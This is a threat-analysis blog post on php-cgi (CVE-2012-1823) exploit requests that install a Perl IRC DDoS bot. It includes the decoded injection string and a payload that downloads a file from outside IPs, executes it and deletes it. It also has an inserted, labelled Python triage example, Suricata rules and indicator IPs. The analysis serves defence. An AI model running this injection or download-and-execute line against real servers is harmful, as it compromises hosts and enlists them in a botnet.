Attempts to gain control of public facing web servers with modified HTTP requests are very common, and can sometimes pose a danger to unpatched systems. With the use of publicly available tooling, these web crawling and attack attempts are extremely easy to perform and are often considered the realm of ‘script-kiddies’. While the likelihood of such an attack being successful is low, an analyst should know how to approach and understand these basic attacks. Many large compromises have come from older vulnerabilities, so they should not be ignored based on age alone.
In this post, I wanted to share a few examples of a DDoS Perl IrcBot we’ve observed - a campaign of attacks similar to the more common Shellbot. In this attack, the attacker crawls the internet looking for public facing web servers, and makes a specially crafted HTTP POST request to each one it finds. These attacks are opportunistic in nature, aiming to catch the lowest hanging fruit across the internet.
Figure 1. Example malicious HTTP POST
As shown in figure 1, the POST request contains the large URL encoded string:
The URL encoding is likely an effort to evade basic detection capabilities. The decoded string is as follows:
cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n
Inspecting some of the instructions will help provide a better idea of what the attacker is attempting to accomplish:
- cgi-bin/php? - Invokes the PHP interpreter in the cgi-bin directory; everything after the ? is handed to it as command-line options.
- allow_url_include=on - Allows include/require of files from remote URLs.
- safe_mode=off - Disables PHP safe mode restrictions.
- suhosin.simulation=on - Disables Suhosin PHP protection, but keeps its logging.
- disable_functions="" - Clears any list of disabled functions already set.
- open_basedir=none - Removes limits on the files PHP is allowed to open.
As you may have noticed, this technique is not new; it has been used continuously since the release of CVE-2012-1823, which allows remote attackers to execute arbitrary code by placing command-line options in the query string.
Because auto_prepend_file=php://input tells the interpreter to execute the raw request body first, the content of the HTTP POST carries the actual file download instruction:
<? system("cd /tmp ; wget http://126.96.36.199/zmuie ; curl -O http://188.8.131.52/zmuie; fetch http://184.108.40.206/zmuie ; chmod +x zmuie ; ./zmuie ; perl zmuie ; rm -rf zmuie "); ?>
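The request described above, worked through as an analyst would when triaging access logs: this is an added example, not code from the original post, and the request target, POST body and TEST-NET address in it are constructed to mirror the post's decoded string rather than captured traffic. It URL-decodes the query, flags php-cgi switch injection and the risky directives listed above, and checks the body for the download-then-execute pattern.

```python
"""Added example: triage php-cgi requests for CVE-2012-1823-style option
injection. All sample values are constructed, modelled on the post."""
import re
from urllib.parse import unquote_plus, urlsplit

# Directive=value pairs from the decoded query string in the post. Any of
# them in a query string means the client is reconfiguring the interpreter.
RISKY_DIRECTIVES = {
    "allow_url_include": "on", "safe_mode": "off", "suhosin.simulation": "on",
    "disable_functions": "", "open_basedir": "none",
    "auto_prepend_file": "php://input",
}
OPTION_RE = re.compile(r'(?:^|\s)-d\s*([A-Za-z0-9_.]+)=("[^"]*"|\S*)')
# Downloader followed closely by a URL: the same idea as the post's Suricata
# rule ("wget" with "http" within a few bytes of it).
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|fetch)\b.{0,12}https?://")

def analyze_request_line(target: str) -> dict:
    """Decode the query of one request target and report php-cgi switches."""
    parts = urlsplit(target)
    query = unquote_plus(parts.query)  # %2D -> '-', '+' -> ' '
    directives = {n: v.strip('"') for n, v in OPTION_RE.findall(query)}
    return {
        "path": parts.path,
        "decoded_query": query,
        # Legitimate query strings never begin with an interpreter switch.
        "switch_injection": query.lstrip().startswith("-"),
        "risky_directives": [n for n, v in directives.items()
                             if RISKY_DIRECTIVES.get(n) == v],
        # php://input as the prepended file makes the POST body execute.
        "body_executes": directives.get("auto_prepend_file") == "php://input",
    }

def triage(target: str, body: str = "") -> str:
    """Return 'malicious', 'suspicious' or 'benign' for one request."""
    f = analyze_request_line(target)
    if f["body_executes"] and DOWNLOAD_RE.search(body):
        return "malicious"
    if f["switch_injection"] or f["risky_directives"]:
        return "suspicious"
    return "benign"

# Constructed samples (TEST-NET address, not an indicator from the post).
SAMPLE_TARGET = ("/cgi-bin/php?%2Dd+allow_url_include%3Don+%2Dd+safe_mode%3Doff"
                 "+%2Dd+suhosin.simulation%3Don+%2Dd+disable_functions%3D%22%22"
                 "+%2Dd+open_basedir%3Dnone+%2Dd+auto_prepend_file%3Dphp%3A%2F%2Finput"
                 "+%2Dd+cgi.force_redirect%3D0+%2Dd+cgi.redirect_status_env%3D0+%2Dn")
SAMPLE_BODY = '<? system("cd /tmp ; wget http://203.0.113.10/zmuie ; perl zmuie"); ?>'
BENIGN_TARGET = "/index.php?page=news&id=42"
```

Feed `triage()` the request target and body from each POST in a web server or proxy log; a "suspicious" verdict with no body usually means a scanner probing for the CGI handler before sending a payload.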
All of the file downloads we’ve observed have been versions of DDoS Perl IrcBot v1.0 / 2017, which is a reused piece of code from 2013. The attackers simply modified small sections of the file in order to change the authorship and the IRC configurations. The most recent attacks have used multiple older versions of the code. For example, the below screenshot shows code that originated in 2013 being used over the past few months:
Figure 2. Example of 2013 code in recent attacks.
One of the more recent attempts used a bot configuration file with the Flood.ro Team name.
Figure 3. Example code showing Flood.ro Team name.
There are many variations of these files (some shown below) that claim to be authored by different groups, including vK Security Team and aloha Security Team. In all of these files, the code contains instructions for inexperienced attackers to work off of and clear indicators of authorship, suggesting that the teams are using these files to increase their reputation as malware authors. Based on attack timing across multiple web scans at large scale, I assess with medium confidence that all of these “teams” are a single entity.
Figure 4. Exploit attempt using cs titled file.
Figure 5. First 54 lines of malicious file.
Between the varying inbound exploit attempts, the attacker experimented with alternative file names; note the .noext extension below:
Figure 6. Inbound exploit attempt using zmuie.noext file.
Figure 7. First 47 lines of malicious zmuie.noext file.
More recently, the attacker figured out that an extension is not really necessary.
Figure 8. Inbound exploit attempt using zmuie file.
Figure 9. First 47 lines of malicious zmuie file.
It's worth noting that these infection attempts have had fairly limited success rates. Once a host is successfully exploited and joins the IRC botnet, it can be controlled by the attacker. As the screenshots above show, DDoS, port scanning, downloading, and flooding are all built-in capabilities that the victim can perform for the attacker. In the botnets we’ve monitored, typically around 200 hosts are members of the botnet at any one time.
Defending against this exploit attempt is as simple as updating PHP. Check out the original NIST CVE post for specifics: nvd.nist.gov/vuln/detail/CVE-2012-1823
There are a number of command line and GUI tools available to decode URL encoded strings. For analysts unsure of how to do this, I recommend checking out CyberChef from GCHQ. Download that locally on your machine, and add it to your browser favorites for easy access. URL decoding is just one capability of the tool, so be sure to check out its other helpful features.
Detection and Indicators:
If you would like to automate the intake of these detections, please see our GitHub Detections repo.
Suricata IDS signature:
- alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"401TRG Generic Webshell Request - POST with wget in body"; flow:established,to_server; content:"wget"; nocase; http_client_body; content:"http"; nocase; http_client_body; within:11; threshold:type limit, track by_src, seconds 3600, count 1; classtype:web-application-attack; sid:600052; rev:1;)
- alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"401TRG Perl DDoS IRCBot File Download"; flow:established,from_server; content:"|6d 79 20 24 70 72 6f 63 65 73 73 20 3d 20 24 72 70 73 5b 72 61 6e 64 20 73 63 61 6c 61 72 20 40 72 70 73 5d 3b|"; sid:600051; rev:1;)
- 220.127.116.11 - IRC Server
- 18.104.22.168 - IRC Server (only.god[.]jp)
- 22.214.171.124 - Malware Drop Location
- 126.96.36.199 - Malware Drop Location
- 188.8.131.52 - Malware Drop Location
- 184.108.40.206 - Malware Drop Location (idip.do[.]am)